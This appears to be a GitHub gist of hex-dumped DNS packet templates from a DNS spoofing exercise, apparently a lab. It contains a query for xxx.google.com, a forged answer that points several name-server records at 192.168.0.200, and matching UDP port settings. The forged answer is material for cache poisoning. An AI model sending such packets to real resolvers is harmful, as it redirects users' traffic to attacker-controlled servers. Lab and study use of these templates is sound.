<TD>
<PRE>-dns-attack...cis</PRE></TD>
</TR>
<TR>
<TD>
<PRE>644-dns-attack...</PRE></TD>
</TR>
<TR>
<TD>
<PRE>.............</PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
</TD>
</TR>
</TABLE>
</TABLE>
</CENTER>
<HR WIDTH="100%">Hex dump generated by <B>gtkhex-1.0</B>
</BODY>
</HTML>
Raw
payload_answer3.html
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="hexdata" CONTENT="GHex export to HTML">
</HEAD>
<BODY>
<TABLE BORDER="0" CELLSPACING="0" WIDTH="100%">
<TR>
<TD WIDTH="33%">
&nbsp;
</TD>
<TD WIDTH="33%" ALIGN="CENTER">
<A HREF="1.html">payload_answer3:</A>
</TD>
<TD WIDTH="33%" ALIGN="RIGHT">
&nbsp;
</TD>
</TR>
</TABLE>
<CENTER>
<TABLE BORDER="1" CELLSPACING="2" CELLPADDING="2">
<TR>
<TD>
<TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0">
<TR>
<TD>
<PRE>00000000</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000011</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000022</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000033</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000044</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000055</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000066</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000077</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000088</PRE>
</TD>
</TR>
</TABLE>
</TD>
<TD>
<TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0">
<TR>
<TD>
<PRE>80 00 00 01 00 00 00 04 00 04 00 00 01 00 01 c0 16</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00 02 00 01 00 02 a3 00 00 06 03 6e 73 33 c0 16 c0</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>16 00 02 00 01 00 02 a3 00 00 06 03 6e 73 34 c0 16</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>c0 16 00 02 00 01 00 02 a3 00 00 06 03 6e 73 35 c0</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>16 c0 16 00 02 00 01 00 02 a3 00 00 06 03 6e 73 36</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>c0 16 c0 32 00 01 00 01 00 02 a3 00 00 04 c0 a8 00</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>c8 c0 44 00 01 00 01 00 02 a3 00 00 04 c0 a8 00 c8</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>c0 56 00 01 00 01 00 02 a3 00 00 04 c0 a8 00 c8 c0</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>68 00 01 00 01 00 02 a3 00 00 04 c0 a8 00 c8 </PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
</TABLE>
</TD>
<TD>
<TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0">
<TR>
<TD>
<PRE>.................</PRE></TD>
</TR>
<TR>
<TD>
<PRE>...........ns3...</PRE></TD>
</TR>
<TR>
<TD>
<PRE>............ns4..</PRE></TD>
</TR>
<TR>
<TD>
<PRE>.............ns5.</PRE></TD>
</TR>
<TR>
<TD>
<PRE>..............ns6</PRE></TD>
</TR>
<TR>
<TD>
<PRE>...2.............</PRE></TD>
</TR>
<TR>
<TD>
<PRE>..D..............</PRE></TD>
</TR>
<TR>
<TD>
<PRE>.V...............</PRE></TD>
</TR>
<TR>
<TD>
<PRE>h..............</PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
</TD>
</TR>
</TABLE>
</TABLE>
</CENTER>
<HR WIDTH="100%">Hex dump generated by <B>gtkhex-1.0</B>
</BODY>
</HTML>
Raw
payload_query.html
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="hexdata" CONTENT="GHex export to HTML">
</HEAD>
<BODY>
<TABLE BORDER="0" CELLSPACING="0" WIDTH="100%">
<TR>
<TD WIDTH="33%">
&nbsp;
</TD>
<TD WIDTH="33%" ALIGN="CENTER">
payload_query:
</TD>
<TD WIDTH="33%" ALIGN="RIGHT">
&nbsp;
</TD>
</TR>
</TABLE>
<CENTER>
<TABLE BORDER="1" CELLSPACING="2" CELLPADDING="2">
<TR>
<TD>
<TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0">
<TR>
<TD>
<PRE>00000000</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000011</PRE>
</TD>
</TR>
</TABLE>
</TD>
<TD>
<TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0">
<TR>
<TD>
<PRE>27 a6 01 00 00 01 00 00 00 00 00 00 03 78 78 78 06</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>67 6f 6f 67 6c 65 03 63 6f 6d 00 00 01 00 01 </PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
</TABLE>
</TD>
<TD>
<TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0">
<TR>
<TD>
<PRE>'............xxx.</PRE></TD>
</TR>
<TR>
<TD>
<PRE>google.com.....</PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
</TD>
</TR>
</TABLE>
</TABLE>
</CENTER>
<HR WIDTH="100%">Hex dump generated by <B>gtkhex-1.0</B>
</BODY>
</HTML>
Raw
payload_query2.html
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="hexdata" CONTENT="GHex export to HTML">
</HEAD>
<BODY>
<TABLE BORDER="0" CELLSPACING="0" WIDTH="100%">
<TR>
<TD WIDTH="33%">
&nbsp;
</TD>
<TD WIDTH="33%" ALIGN="CENTER">
payload_query2:
</TD>
<TD WIDTH="33%" ALIGN="RIGHT">
&nbsp;
</TD>
</TR>
</TABLE>
<CENTER>
<TABLE BORDER="1" CELLSPACING="2" CELLPADDING="2">
<TR>
<TD>
<TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0">
<TR>
<TD>
<PRE>00000000</PRE>
</TD>
</TR>
</TABLE>
</TD>
<TD>
<TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0">
<TR>
<TD>
<PRE>12 34 01 00 00 01 00 00 00 00 00 00 00 00 01 00 01</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
</TABLE>
</TD>
<TD>
<TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0">
<TR>
<TD>
<PRE>.4...............</PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
</TD>
</TR>
</TABLE>
</TABLE>
</CENTER>
<HR WIDTH="100%">Hex dump generated by <B>gtkhex-1.0</B>
</BODY>
</HTML>
Raw
udp_header_answer
sport, 53
dport, 33333
control, !
Raw
udp_header_query
sport, 33333
dport, 53
control,!
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment